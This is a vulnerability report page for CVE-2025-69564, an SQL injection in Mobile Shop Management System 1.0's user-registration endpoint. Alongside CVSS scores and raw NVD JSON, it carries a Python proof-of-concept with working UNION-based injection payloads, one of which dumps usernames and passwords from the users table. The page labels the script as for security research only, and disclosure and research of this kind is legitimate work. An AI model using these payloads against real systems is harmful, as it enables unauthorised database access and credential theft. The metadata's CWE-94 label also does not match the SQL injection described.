Security Vulnerability Report
中文
CVE-2025-69564 CVSS 9.8 CRITICAL

CVE-2025-69564

Published: 2026-01-27 17:16:10
Last Modified: 2026-02-02 19:46:39

Description

code-projects Mobile Shop Management System 1.0 is vulnerable to SQL Injection in /ExAddNewUser.php via the Name, Address, email, UserName, Password, confirm_password, Role, Branch, and Activate parameters.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fabian:mobile_shop_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Mobile Shop Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-69564 PoC - Mobile Shop Management System 1.0 SQL Injection Target: /ExAddNewUser.php Vulnerable Parameters: Name, Address, email, UserName, Password, confirm_password, Role, Branch, Activate CVSS Score: 9.8 (CRITICAL) """ import requests import sys from urllib.parse import urlencode def exploit_sql_injection(target_url): """ SQL Injection PoC for CVE-2025-69564 This demonstrates extracting database version information """ # Vulnerable endpoint endpoint = f"{target_url}/ExAddNewUser.php" # Malicious payload to extract database version # Using UNION-based SQL injection payload = { 'Name': "admin' UNION SELECT version(),2,3,4,5,6,7,8,9-- -", 'Address': 'Test Address', 'email': '[email protected]', 'UserName': 'testuser', 'Password': 'test123', 'confirm_password': 'test123', 'Role': '1', 'Branch': '1', 'Activate': '1' } print(f"[*] Target: {endpoint}") print(f"[*] Payload: {payload['Name']}") try: response = requests.post(endpoint, data=payload, timeout=10) print(f"[+] Status Code: {response.status_code}") print(f"[*] Response Length: {len(response.text)}") # Check for SQL error indicators if 'SQL' in response.text or 'mysql' in response.text.lower() or 'error' in response.text.lower(): print("[!] Potential SQL Injection detected - application may reveal database information") print(f"[*] Response snippet: {response.text[:500]}") else: print("[*] No obvious SQL error in response - manual verification needed") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") def extract_users(target_url): """ Extract user credentials from the database """ endpoint = f"{target_url}/ExAddNewUser.php" # Payload to extract users table data payload = { 'Name': "admin' UNION SELECT group_concat(UserName,0x3a,Password),2,3,4,5,6,7,8,9 FROM users-- -", 'Address': 'Test', 'email': '[email protected]', 'UserName': 'test', 'Password': 'test', 'confirm_password': 'test', 'Role': '1', 'Branch': '1', 'Activate': '1' } try: response = requests.post(endpoint, data=payload, timeout=10) if 'admin:' in response.text: print("[!] Successfully extracted user credentials from database") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: python3 {sys.argv[0]} <target_url>") print(f"Example: python3 {sys.argv[0]} http://localhost:8080") sys.exit(1) target = sys.argv[1].rstrip('/') exploit_sql_injection(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69564", "sourceIdentifier": "[email protected]", "published": "2026-01-27T17:16:10.063", "lastModified": "2026-02-02T19:46:38.523", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "code-projects Mobile Shop Management System 1.0 is vulnerable to SQL Injection in /ExAddNewUser.php via the Name, Address, email, UserName, Password, confirm_password, Role, Branch, and Activate parameters."}, {"lang": "es", "value": "El Sistema de Gestión de Tiendas Móviles 1.0 de code-projects es vulnerable a inyección SQL en /ExAddNewUser.PHP a través de los parámetros Name, Address, email, UserName, Password, confirm_password, Role, Branch y Activate."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:mobile_shop_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "958D1268-CF0E-40EF-A202-4E11EED70E06"}]}]}], "references": [{"url": "https://gist.github.com/lih28984-commits/87eacfc32186020a04e03a2af448723f", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://gitee.com/Z_180yc/zyy/issues/IDCEJP", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}